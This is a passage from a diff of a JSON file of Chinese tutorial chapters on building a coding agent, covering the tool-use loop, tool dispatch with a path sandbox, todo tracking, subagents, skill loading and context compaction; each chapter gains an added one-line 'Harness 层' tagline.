response.content})\nif response.stop_reason != \"tool_use\":\n return\n```\n\n4. 执行每个工具调用, 收集结果, 作为 user 消息追加。回到第 2 步。\n\n```python\nresults = []\nfor block in response.content:\n if block.type == \"tool_use\":\n output = run_bash(block.input[\"command\"])\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\nmessages.append({\"role\": \"user\", \"content\": results})\n```\n\n组装为一个完整函数:\n\n```python\ndef agent_loop(query):\n messages = [{\"role\": \"user\", \"content\": query}]\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n\n if response.stop_reason != \"tool_use\":\n return\n\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n output = run_bash(block.input[\"command\"])\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\n messages.append({\"role\": \"user\", \"content\": results})\n```\n\n不到 30 行, 这就是整个 Agent。后面 11 个章节都在这个循环上叠加机制 -- 循环本身始终不变。\n\n## 变更内容\n\n| 组件 | 之前 | 之后 |\n|---------------|------------|--------------------------------|\n| Agent loop | (无) | `while True` + stop_reason |\n| Tools | (无) | `bash` (单一工具) |\n| Messages | (无) | 累积式消息列表 |\n| Control flow | (无) | `stop_reason != \"tool_use\"` |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s01_agent_loop.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Create a file called hello.py that prints \"Hello, World!\"`\n2. `List all Python files in this directory`\n3. `What is the current git branch?`\n4. `Create a directory called test_output and write 3 files in it`\n" + "content": "# s01: The Agent Loop (Agent 循环)\n\n`[ s01 ] s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"One loop & Bash is all you need\"* -- 一个工具 + 一个循环 = 一个 Agent。\n>\n> **Harness 层**: 循环 -- 模型与真实世界的第一道连接。\n\n## 问题\n\n语言模型能推理代码, 但碰不到真实世界 -- 不能读文件、跑测试、看报错。没有循环, 每次工具调用你都得手动把结果粘回去。你自己就是那个循环。\n\n## 解决方案\n\n```\n+--------+ +-------+ +---------+\n| User | ---> | LLM | ---> | Tool |\n| prompt | | | | execute |\n+--------+ +---+---+ +----+----+\n ^ |\n | tool_result |\n +----------------+\n (loop until stop_reason != \"tool_use\")\n```\n\n一个退出条件控制整个流程。循环持续运行, 直到模型不再调用工具。\n\n## 工作原理\n\n1. 用户 prompt 作为第一条消息。\n\n```python\nmessages.append({\"role\": \"user\", \"content\": query})\n```\n\n2. 将消息和工具定义一起发给 LLM。\n\n```python\nresponse = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n)\n```\n\n3. 追加助手响应。检查 `stop_reason` -- 如果模型没有调用工具, 结束。\n\n```python\nmessages.append({\"role\": \"assistant\", \"content\": response.content})\nif response.stop_reason != \"tool_use\":\n return\n```\n\n4. 执行每个工具调用, 收集结果, 作为 user 消息追加。回到第 2 步。\n\n```python\nresults = []\nfor block in response.content:\n if block.type == \"tool_use\":\n output = run_bash(block.input[\"command\"])\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\nmessages.append({\"role\": \"user\", \"content\": results})\n```\n\n组装为一个完整函数:\n\n```python\ndef agent_loop(query):\n messages = [{\"role\": \"user\", \"content\": query}]\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n\n if response.stop_reason != \"tool_use\":\n return\n\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n output = run_bash(block.input[\"command\"])\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\n messages.append({\"role\": \"user\", \"content\": results})\n```\n\n不到 30 行, 这就是整个 Agent。后面 11 个章节都在这个循环上叠加机制 -- 循环本身始终不变。\n\n## 变更内容\n\n| 组件 | 之前 | 之后 |\n|---------------|------------|--------------------------------|\n| Agent loop | (无) | `while True` + stop_reason |\n| Tools | (无) | `bash` (单一工具) |\n| Messages | (无) | 累积式消息列表 |\n| Control flow | (无) | `stop_reason != \"tool_use\"` |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s01_agent_loop.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Create a file called hello.py that prints \"Hello, World!\"`\n2. `List all Python files in this directory`\n3. `What is the current git branch?`\n4. `Create a directory called test_output and write 3 files in it`\n" }, { "version": "s02", "locale": "zh", "title": "s02: Tool Use (工具使用)", - "content": "# s02: Tool Use (工具使用)\n\n`s01 > [ s02 ] s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"加一个工具, 只加一个 handler\"* -- 循环不用动, 新工具注册进 dispatch map 就行。\n\n## 问题\n\n只有 `bash` 时, 所有操作都走 shell。`cat` 截断不可预测, `sed` 遇到特殊字符就崩, 每次 bash 调用都是不受约束的安全面。专用工具 (`read_file`, `write_file`) 可以在工具层面做路径沙箱。\n\n关键洞察: 加工具不需要改循环。\n\n## 解决方案\n\n```\n+--------+ +-------+ +------------------+\n| User | ---> | LLM | ---> | Tool Dispatch |\n| prompt | | | | { |\n+--------+ +---+---+ | bash: run_bash |\n ^ | read: run_read |\n | | write: run_wr |\n +-----------+ edit: run_edit |\n tool_result | } |\n +------------------+\n\nThe dispatch map is a dict: {tool_name: handler_function}.\nOne lookup replaces any if/elif chain.\n```\n\n## 工作原理\n\n1. 每个工具有一个处理函数。路径沙箱防止逃逸工作区。\n\n```python\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_read(path: str, limit: int = None) -> str:\n text = safe_path(path).read_text()\n lines = text.splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit]\n return \"\\n\".join(lines)[:50000]\n```\n\n2. dispatch map 将工具名映射到处理函数。\n\n```python\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"],\n kw[\"new_text\"]),\n}\n```\n\n3. 循环中按名称查找处理函数。循环体本身与 s01 完全一致。\n\n```python\nfor block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input) if handler \\\n else f\"Unknown tool: {block.name}\"\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\n```\n\n加工具 = 加 handler + 加 schema。循环永远不变。\n\n## 相对 s01 的变更\n\n| 组件 | 之前 (s01) | 之后 (s02) |\n|----------------|--------------------|--------------------------------|\n| Tools | 1 (仅 bash) | 4 (bash, read, write, edit) |\n| Dispatch | 硬编码 bash 调用 | `TOOL_HANDLERS` 字典 |\n| 路径安全 | 无 | `safe_path()` 沙箱 |\n| Agent loop | 不变 | 不变 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s02_tool_use.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Read the file requirements.txt`\n2. `Create a file called greet.py with a greet(name) function`\n3. `Edit greet.py to add a docstring to the function`\n4. `Read greet.py to verify the edit worked`\n" + "content": "# s02: Tool Use (工具使用)\n\n`s01 > [ s02 ] s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"加一个工具, 只加一个 handler\"* -- 循环不用动, 新工具注册进 dispatch map 就行。\n>\n> **Harness 层**: 工具分发 -- 扩展模型能触达的边界。\n\n## 问题\n\n只有 `bash` 时, 所有操作都走 shell。`cat` 截断不可预测, `sed` 遇到特殊字符就崩, 每次 bash 调用都是不受约束的安全面。专用工具 (`read_file`, `write_file`) 可以在工具层面做路径沙箱。\n\n关键洞察: 加工具不需要改循环。\n\n## 解决方案\n\n```\n+--------+ +-------+ +------------------+\n| User | ---> | LLM | ---> | Tool Dispatch |\n| prompt | | | | { |\n+--------+ +---+---+ | bash: run_bash |\n ^ | read: run_read |\n | | write: run_wr |\n +-----------+ edit: run_edit |\n tool_result | } |\n +------------------+\n\nThe dispatch map is a dict: {tool_name: handler_function}.\nOne lookup replaces any if/elif chain.\n```\n\n## 工作原理\n\n1. 每个工具有一个处理函数。路径沙箱防止逃逸工作区。\n\n```python\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_read(path: str, limit: int = None) -> str:\n text = safe_path(path).read_text()\n lines = text.splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit]\n return \"\\n\".join(lines)[:50000]\n```\n\n2. dispatch map 将工具名映射到处理函数。\n\n```python\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"],\n kw[\"new_text\"]),\n}\n```\n\n3. 循环中按名称查找处理函数。循环体本身与 s01 完全一致。\n\n```python\nfor block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input) if handler \\\n else f\"Unknown tool: {block.name}\"\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\n```\n\n加工具 = 加 handler + 加 schema。循环永远不变。\n\n## 相对 s01 的变更\n\n| 组件 | 之前 (s01) | 之后 (s02) |\n|----------------|--------------------|--------------------------------|\n| Tools | 1 (仅 bash) | 4 (bash, read, write, edit) |\n| Dispatch | 硬编码 bash 调用 | `TOOL_HANDLERS` 字典 |\n| 路径安全 | 无 | `safe_path()` 沙箱 |\n| Agent loop | 不变 | 不变 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s02_tool_use.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Read the file requirements.txt`\n2. `Create a file called greet.py with a greet(name) function`\n3. `Edit greet.py to add a docstring to the function`\n4. `Read greet.py to verify the edit worked`\n" }, { "version": "s03", "locale": "zh", "title": "s03: TodoWrite (待办写入)", - "content": "# s03: TodoWrite (待办写入)\n\n`s01 > s02 > [ s03 ] s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"没有计划的 agent 走哪算哪\"* -- 先列步骤再动手, 完成率翻倍。\n\n## 问题\n\n多步任务中, 模型会丢失进度 -- 重复做过的事、跳步、跑偏。对话越长越严重: 工具结果不断填满上下文, 系统提示的影响力逐渐被稀释。一个 10 步重构可能做完 1-3 步就开始即兴发挥, 因为 4-10 步已经被挤出注意力了。\n\n## 解决方案\n\n```\n+--------+ +-------+ +---------+\n| User | ---> | LLM | ---> | Tools |\n| prompt | | | | + todo |\n+--------+ +---+---+ +----+----+\n ^ |\n | tool_result |\n +----------------+\n |\n +-----------+-----------+\n | TodoManager state |\n | [ ] task A |\n | [>] task B <- doing |\n | [x] task C |\n +-----------------------+\n |\n if rounds_since_todo >= 3:\n inject into tool_result\n```\n\n## 工作原理\n\n1. TodoManager 存储带状态的项目。同一时间只允许一个 `in_progress`。\n\n```python\nclass TodoManager:\n def update(self, items: list) -> str:\n validated, in_progress_count = [], 0\n for item in items:\n status = item.get(\"status\", \"pending\")\n if status == \"in_progress\":\n in_progress_count += 1\n validated.append({\"id\": item[\"id\"], \"text\": item[\"text\"],\n \"status\": status})\n if in_progress_count > 1:\n raise ValueError(\"Only one task can be in_progress\")\n self.items = validated\n return self.render()\n```\n\n2. `todo` 工具和其他工具一样加入 dispatch map。\n\n```python\nTOOL_HANDLERS = {\n # ...base tools...\n \"todo\": lambda **kw: TODO.update(kw[\"items\"]),\n}\n```\n\n3. nag reminder: 模型连续 3 轮以上不调用 `todo` 时注入提醒。\n\n```python\nif rounds_since_todo >= 3 and messages:\n last = messages[-1]\n if last[\"role\"] == \"user\" and isinstance(last.get(\"content\"), list):\n last[\"content\"].insert(0, {\n \"type\": \"text\",\n \"text\": \"Update your todos.\",\n })\n```\n\n\"同时只能有一个 in_progress\" 强制顺序聚焦。nag reminder 制造问责压力 -- 你不更新计划, 系统就追着你问。\n\n## 相对 s02 的变更\n\n| 组件 | 之前 (s02) | 之后 (s03) |\n|----------------|------------------|--------------------------------|\n| Tools | 4 | 5 (+todo) |\n| 规划 | 无 | 带状态的 TodoManager |\n| Nag 注入 | 无 | 3 轮后注入 `` |\n| Agent loop | 简单分发 | + rounds_since_todo 计数器 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s03_todo_write.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Refactor the file hello.py: add type hints, docstrings, and a main guard`\n2. `Create a Python package with __init__.py, utils.py, and tests/test_utils.py`\n3. `Review all Python files and fix any style issues`\n" + "content": "# s03: TodoWrite (待办写入)\n\n`s01 > s02 > [ s03 ] s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"没有计划的 agent 走哪算哪\"* -- 先列步骤再动手, 完成率翻倍。\n>\n> **Harness 层**: 规划 -- 让模型不偏航, 但不替它画航线。\n\n## 问题\n\n多步任务中, 模型会丢失进度 -- 重复做过的事、跳步、跑偏。对话越长越严重: 工具结果不断填满上下文, 系统提示的影响力逐渐被稀释。一个 10 步重构可能做完 1-3 步就开始即兴发挥, 因为 4-10 步已经被挤出注意力了。\n\n## 解决方案\n\n```\n+--------+ +-------+ +---------+\n| User | ---> | LLM | ---> | Tools |\n| prompt | | | | + todo |\n+--------+ +---+---+ +----+----+\n ^ |\n | tool_result |\n +----------------+\n |\n +-----------+-----------+\n | TodoManager state |\n | [ ] task A |\n | [>] task B <- doing |\n | [x] task C |\n +-----------------------+\n |\n if rounds_since_todo >= 3:\n inject into tool_result\n```\n\n## 工作原理\n\n1. TodoManager 存储带状态的项目。同一时间只允许一个 `in_progress`。\n\n```python\nclass TodoManager:\n def update(self, items: list) -> str:\n validated, in_progress_count = [], 0\n for item in items:\n status = item.get(\"status\", \"pending\")\n if status == \"in_progress\":\n in_progress_count += 1\n validated.append({\"id\": item[\"id\"], \"text\": item[\"text\"],\n \"status\": status})\n if in_progress_count > 1:\n raise ValueError(\"Only one task can be in_progress\")\n self.items = validated\n return self.render()\n```\n\n2. `todo` 工具和其他工具一样加入 dispatch map。\n\n```python\nTOOL_HANDLERS = {\n # ...base tools...\n \"todo\": lambda **kw: TODO.update(kw[\"items\"]),\n}\n```\n\n3. nag reminder: 模型连续 3 轮以上不调用 `todo` 时注入提醒。\n\n```python\nif rounds_since_todo >= 3 and messages:\n last = messages[-1]\n if last[\"role\"] == \"user\" and isinstance(last.get(\"content\"), list):\n last[\"content\"].insert(0, {\n \"type\": \"text\",\n \"text\": \"Update your todos.\",\n })\n```\n\n\"同时只能有一个 in_progress\" 强制顺序聚焦。nag reminder 制造问责压力 -- 你不更新计划, 系统就追着你问。\n\n## 相对 s02 的变更\n\n| 组件 | 之前 (s02) | 之后 (s03) |\n|----------------|------------------|--------------------------------|\n| Tools | 4 | 5 (+todo) |\n| 规划 | 无 | 带状态的 TodoManager |\n| Nag 注入 | 无 | 3 轮后注入 `` |\n| Agent loop | 简单分发 | + rounds_since_todo 计数器 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s03_todo_write.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Refactor the file hello.py: add type hints, docstrings, and a main guard`\n2. `Create a Python package with __init__.py, utils.py, and tests/test_utils.py`\n3. `Review all Python files and fix any style issues`\n" }, { "version": "s04", "locale": "zh", "title": "s04: Subagents (Subagent)", - "content": "# s04: Subagents (Subagent)\n\n`s01 > s02 > s03 > [ s04 ] s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"大任务拆小, 每个小任务干净的上下文\"* -- Subagent 用独立 messages[], 不污染主对话。\n\n## 问题\n\nAgent 工作越久, messages 数组越胖。每次读文件、跑命令的输出都永久留在上下文里。\"这个项目用什么测试框架?\" 可能要读 5 个文件, 但父 Agent 只需要一个词: \"pytest。\"\n\n## 解决方案\n\n```\nParent agent Subagent\n+------------------+ +------------------+\n| messages=[...] | | messages=[] | <-- fresh\n| | dispatch | |\n| tool: task | ----------> | while tool_use: |\n| prompt=\"...\" | | call tools |\n| | summary | append results |\n| result = \"...\" | <---------- | return last text |\n+------------------+ +------------------+\n\nParent context stays clean. Subagent context is discarded.\n```\n\n## 工作原理\n\n1. 父 Agent 有一个 `task` 工具。Subagent 拥有除 `task` 外的所有基础工具 (禁止递归生成)。\n\n```python\nPARENT_TOOLS = CHILD_TOOLS + [\n {\"name\": \"task\",\n \"description\": \"Spawn a subagent with fresh context.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"prompt\": {\"type\": \"string\"}},\n \"required\": [\"prompt\"],\n }},\n]\n```\n\n2. Subagent 以 `messages=[]` 启动, 运行自己的循环。只有最终文本返回给父 Agent。\n\n```python\ndef run_subagent(prompt: str) -> str:\n sub_messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(30): # safety limit\n response = client.messages.create(\n model=MODEL, system=SUBAGENT_SYSTEM,\n messages=sub_messages,\n tools=CHILD_TOOLS, max_tokens=8000,\n )\n sub_messages.append({\"role\": \"assistant\",\n \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n break\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input)\n results.append({\"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output)[:50000]})\n sub_messages.append({\"role\": \"user\", \"content\": results})\n return \"\".join(\n b.text for b in response.content if hasattr(b, \"text\")\n ) or \"(no summary)\"\n```\n\nSubagent 可能跑了 30+ 次工具调用, 但整个消息历史直接丢弃。父 Agent 收到的只是一段摘要文本, 作为普通 `tool_result` 返回。\n\n## 相对 s03 的变更\n\n| 组件 | 之前 (s03) | 之后 (s04) |\n|----------------|------------------|-------------------------------|\n| Tools | 5 | 5 (基础) + task (仅父端) |\n| 上下文 | 单一共享 | 父 + 子隔离 |\n| Subagent | 无 | `run_subagent()` 函数 |\n| 返回值 | 不适用 | 仅摘要文本 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s04_subagent.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Use a subtask to find what testing framework this project uses`\n2. `Delegate: read all .py files and summarize what each one does`\n3. `Use a task to create a new module, then verify it from here`\n" + "content": "# s04: Subagents (Subagent)\n\n`s01 > s02 > s03 > [ s04 ] s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"大任务拆小, 每个小任务干净的上下文\"* -- Subagent 用独立 messages[], 不污染主对话。\n>\n> **Harness 层**: 上下文隔离 -- 守护模型的思维清晰度。\n\n## 问题\n\nAgent 工作越久, messages 数组越臃肿。每次读文件、跑命令的输出都永久留在上下文里。\"这个项目用什么测试框架?\" 可能要读 5 个文件, 但父 Agent 只需要一个词: \"pytest。\"\n\n## 解决方案\n\n```\nParent agent Subagent\n+------------------+ +------------------+\n| messages=[...] | | messages=[] | <-- fresh\n| | dispatch | |\n| tool: task | ----------> | while tool_use: |\n| prompt=\"...\" | | call tools |\n| | summary | append results |\n| result = \"...\" | <---------- | return last text |\n+------------------+ +------------------+\n\nParent context stays clean. Subagent context is discarded.\n```\n\n## 工作原理\n\n1. 父 Agent 有一个 `task` 工具。Subagent 拥有除 `task` 外的所有基础工具 (禁止递归生成)。\n\n```python\nPARENT_TOOLS = CHILD_TOOLS + [\n {\"name\": \"task\",\n \"description\": \"Spawn a subagent with fresh context.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"prompt\": {\"type\": \"string\"}},\n \"required\": [\"prompt\"],\n }},\n]\n```\n\n2. Subagent 以 `messages=[]` 启动, 运行自己的循环。只有最终文本返回给父 Agent。\n\n```python\ndef run_subagent(prompt: str) -> str:\n sub_messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(30): # safety limit\n response = client.messages.create(\n model=MODEL, system=SUBAGENT_SYSTEM,\n messages=sub_messages,\n tools=CHILD_TOOLS, max_tokens=8000,\n )\n sub_messages.append({\"role\": \"assistant\",\n \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n break\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input)\n results.append({\"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output)[:50000]})\n sub_messages.append({\"role\": \"user\", \"content\": results})\n return \"\".join(\n b.text for b in response.content if hasattr(b, \"text\")\n ) or \"(no summary)\"\n```\n\nSubagent 可能跑了 30+ 次工具调用, 但整个消息历史直接丢弃。父 Agent 收到的只是一段摘要文本, 作为普通 `tool_result` 返回。\n\n## 相对 s03 的变更\n\n| 组件 | 之前 (s03) | 之后 (s04) |\n|----------------|------------------|-------------------------------|\n| Tools | 5 | 5 (基础) + task (仅父端) |\n| 上下文 | 单一共享 | 父 + 子隔离 |\n| Subagent | 无 | `run_subagent()` 函数 |\n| 返回值 | 不适用 | 仅摘要文本 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s04_subagent.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Use a subtask to find what testing framework this project uses`\n2. `Delegate: read all .py files and summarize what each one does`\n3. `Use a task to create a new module, then verify it from here`\n" }, { "version": "s05", "locale": "zh", "title": "s05: Skills (Skill 加载)", - "content": "# s05: Skills (Skill 加载)\n\n`s01 > s02 > s03 > s04 > [ s05 ] s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"用到什么知识, 临时加载什么知识\"* -- 通过 tool_result 注入, 不塞 system prompt。\n\n## 问题\n\n你希望 Agent 遵循特定领域的工作流: git 约定、测试模式、代码审查清单。全塞进系统提示太浪费 -- 10 个 Skill, 每个 2000 token, 就是 20,000 token, 大部分跟当前任务毫无关系。\n\n## 解决方案\n\n```\nSystem prompt (Layer 1 -- always present):\n+--------------------------------------+\n| You are a coding agent. |\n| Skills available: |\n| - git: Git workflow helpers | ~100 tokens/skill\n| - test: Testing best practices |\n+--------------------------------------+\n\nWhen model calls load_skill(\"git\"):\n+--------------------------------------+\n| tool_result (Layer 2 -- on demand): |\n| |\n| Full git workflow instructions... | ~2000 tokens\n| Step 1: ... |\n| |\n+--------------------------------------+\n```\n\n第一层: 系统提示中放 Skill 名称 (低成本)。第二层: tool_result 中按需放完整内容。\n\n## 工作原理\n\n1. 每个 Skill 是一个目录, 包含 `SKILL.md` 文件和 YAML frontmatter。\n\n```\nskills/\n pdf/\n SKILL.md # ---\\n name: pdf\\n description: Process PDF files\\n ---\\n ...\n code-review/\n SKILL.md # ---\\n name: code-review\\n description: Review code\\n ---\\n ...\n```\n\n2. SkillLoader 递归扫描 `SKILL.md` 文件, 用目录名作为 Skill 标识。\n\n```python\nclass SkillLoader:\n def __init__(self, skills_dir: Path):\n self.skills = {}\n for f in sorted(skills_dir.rglob(\"SKILL.md\")):\n text = f.read_text()\n meta, body = self._parse_frontmatter(text)\n name = meta.get(\"name\", f.parent.name)\n self.skills[name] = {\"meta\": meta, \"body\": body}\n\n def get_descriptions(self) -> str:\n lines = []\n for name, skill in self.skills.items():\n desc = skill[\"meta\"].get(\"description\", \"\")\n lines.append(f\" - {name}: {desc}\")\n return \"\\n\".join(lines)\n\n def get_content(self, name: str) -> str:\n skill = self.skills.get(name)\n if not skill:\n return f\"Error: Unknown skill '{name}'.\"\n return f\"\\n{skill['body']}\\n\"\n```\n\n3. 第一层写入系统提示。第二层不过是 dispatch map 中的又一个工具。\n\n```python\nSYSTEM = f\"\"\"You are a coding agent at {WORKDIR}.\nSkills available:\n{SKILL_LOADER.get_descriptions()}\"\"\"\n\nTOOL_HANDLERS = {\n # ...base tools...\n \"load_skill\": lambda **kw: SKILL_LOADER.get_content(kw[\"name\"]),\n}\n```\n\n模型知道有哪些 Skill (便宜), 需要时再加载完整内容 (贵)。\n\n## 相对 s04 的变更\n\n| 组件 | 之前 (s04) | 之后 (s05) |\n|----------------|------------------|--------------------------------|\n| Tools | 5 (基础 + task) | 5 (基础 + load_skill) |\n| 系统提示 | 静态字符串 | + Skill 描述列表 |\n| 知识库 | 无 | skills/\\*/SKILL.md 文件 |\n| 注入方式 | 无 | 两层 (系统提示 + result) |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s05_skill_loading.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `What skills are available?`\n2. `Load the agent-builder skill and follow its instructions`\n3. `I need to do a code review -- load the relevant skill first`\n4. `Build an MCP server using the mcp-builder skill`\n" + "content": "# s05: Skills (Skill 加载)\n\n`s01 > s02 > s03 > s04 > [ s05 ] s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"用到什么知识, 临时加载什么知识\"* -- 通过 tool_result 注入, 不塞 system prompt。\n>\n> **Harness 层**: 按需知识 -- 模型开口要时才给的领域专长。\n\n## 问题\n\n你希望 Agent 遵循特定领域的工作流: git 约定、测试模式、代码审查清单。全塞进系统提示太浪费 -- 10 个 Skill, 每个 2000 token, 就是 20,000 token, 大部分跟当前任务毫无关系。\n\n## 解决方案\n\n```\nSystem prompt (Layer 1 -- always present):\n+--------------------------------------+\n| You are a coding agent. |\n| Skills available: |\n| - git: Git workflow helpers | ~100 tokens/skill\n| - test: Testing best practices |\n+--------------------------------------+\n\nWhen model calls load_skill(\"git\"):\n+--------------------------------------+\n| tool_result (Layer 2 -- on demand): |\n| |\n| Full git workflow instructions... | ~2000 tokens\n| Step 1: ... |\n| |\n+--------------------------------------+\n```\n\n第一层: 系统提示中放 Skill 名称 (低成本)。第二层: tool_result 中按需放完整内容。\n\n## 工作原理\n\n1. 每个 Skill 是一个目录, 包含 `SKILL.md` 文件和 YAML frontmatter。\n\n```\nskills/\n pdf/\n SKILL.md # ---\\n name: pdf\\n description: Process PDF files\\n ---\\n ...\n code-review/\n SKILL.md # ---\\n name: code-review\\n description: Review code\\n ---\\n ...\n```\n\n2. SkillLoader 递归扫描 `SKILL.md` 文件, 用目录名作为 Skill 标识。\n\n```python\nclass SkillLoader:\n def __init__(self, skills_dir: Path):\n self.skills = {}\n for f in sorted(skills_dir.rglob(\"SKILL.md\")):\n text = f.read_text()\n meta, body = self._parse_frontmatter(text)\n name = meta.get(\"name\", f.parent.name)\n self.skills[name] = {\"meta\": meta, \"body\": body}\n\n def get_descriptions(self) -> str:\n lines = []\n for name, skill in self.skills.items():\n desc = skill[\"meta\"].get(\"description\", \"\")\n lines.append(f\" - {name}: {desc}\")\n return \"\\n\".join(lines)\n\n def get_content(self, name: str) -> str:\n skill = self.skills.get(name)\n if not skill:\n return f\"Error: Unknown skill '{name}'.\"\n return f\"\\n{skill['body']}\\n\"\n```\n\n3. 第一层写入系统提示。第二层不过是 dispatch map 中的又一个工具。\n\n```python\nSYSTEM = f\"\"\"You are a coding agent at {WORKDIR}.\nSkills available:\n{SKILL_LOADER.get_descriptions()}\"\"\"\n\nTOOL_HANDLERS = {\n # ...base tools...\n \"load_skill\": lambda **kw: SKILL_LOADER.get_content(kw[\"name\"]),\n}\n```\n\n模型知道有哪些 Skill (便宜), 需要时再加载完整内容 (贵)。\n\n## 相对 s04 的变更\n\n| 组件 | 之前 (s04) | 之后 (s05) |\n|----------------|------------------|--------------------------------|\n| Tools | 5 (基础 + task) | 5 (基础 + load_skill) |\n| 系统提示 | 静态字符串 | + Skill 描述列表 |\n| 知识库 | 无 | skills/\\*/SKILL.md 文件 |\n| 注入方式 | 无 | 两层 (系统提示 + result) |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s05_skill_loading.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `What skills are available?`\n2. `Load the agent-builder skill and follow its instructions`\n3. `I need to do a code review -- load the relevant skill first`\n4. `Build an MCP server using the mcp-builder skill`\n" }, { "version": "s06", "locale": "zh", "title": "s06: Context Compact (上下文压缩)", - "content": "# s06: Context Compact (上下文压缩)\n\n`s01 > s02 > s03 > s04 > s05 > [ s06 ] | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"上下文总会满, 要有办法腾地方\"* -- 三层压缩策略, 换来无限会话。\n\n## 问题\n\n上下文窗口是有限的。读一个 1000 行的文件就吃掉 ~4000 token; 读 30 个文件、跑 20 条命令, 轻松突破 100k token。不压缩, Agent 根本没法在大项目里干活。\n\n## 解决方案\n\n三层压缩, 激进程度递增:\n\n```\nEvery turn:\n+------------------+\n| Tool call result |\n+------------------+\n |\n v\n[Layer 1: micro_compact] (silent, every turn)\n Replace tool_result > 3 turns old\n with \"[Previous: used {tool_name}]\"\n |\n v\n[Check: tokens > 50000?]\n | |\n no yes\n | |\n v v\ncontinue [Layer 2: auto_compact]\n Save transcript to .transcripts/\n LLM summarizes conversation.\n Replace all messages with [summary].\n |\n v\n 